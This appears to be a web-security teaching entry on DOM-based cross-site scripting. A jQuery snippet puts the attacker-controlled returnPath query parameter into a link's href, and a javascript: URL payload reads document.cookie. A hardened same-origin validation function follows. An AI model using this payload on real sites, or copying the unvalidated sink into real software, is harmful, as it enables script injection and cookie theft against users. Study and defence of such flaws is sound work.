DOM XSS: jQuery Anchor href Attribute Sink Using location.search Source
Vulnerable:
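$(function() {
    // Source: the returnPath query parameter (attacker-controlled).
    // Sink: the href attribute of #backLink, set without validating the URL scheme.
    $('#backLink').attr("href", (new URLSearchParams(window.location.search)).get('returnPath'));
});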
Payload: /feedback?returnPath=javascript:alert(document.cookie)
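A hardened counterpart to the vulnerable snippet, added here as an example and not part of the original page: the value is parsed with the URL API and only same-origin http(s) targets reach the href sink. The function name `safeReturnPath`, its parameters and the `/` fallback are assumptions made for this example.

```javascript
// Added example: validate returnPath before it reaches the href sink.
// safeReturnPath, its parameters and the '/' fallback are hypothetical names.
function safeReturnPath(raw, origin, fallback = '/') {
  if (typeof raw !== 'string' || raw === '') return fallback;
  let url;
  try {
    // Resolve against the page's own origin, as the browser does for an href.
    // The URL parser also normalizes case and strips tabs/newlines/leading
    // whitespace, so the scheme check below sees what the browser would see.
    url = new URL(raw, origin);
  } catch (e) {
    return fallback;
  }
  // Reject javascript:, data: and every other non-web scheme.
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return fallback;
  // Reject absolute and protocol-relative (//host) URLs pointing elsewhere.
  if (url.origin !== new URL(origin).origin) return fallback;
  // Emit a normalized same-origin path, dropping scheme and host.
  return url.pathname + url.search + url.hash;
}

// Browser wiring: same source and sink as the vulnerable snippet.
// Skipped when run outside a page that has jQuery loaded.
if (typeof window !== 'undefined' && typeof $ === 'function') {
  $(function () {
    const raw = new URLSearchParams(window.location.search).get('returnPath');
    $('#backLink').attr('href', safeReturnPath(raw, window.location.origin));
  });
}
```

With the payload shown above, `returnPath` resolves to the `javascript:` scheme and the link falls back to `/`.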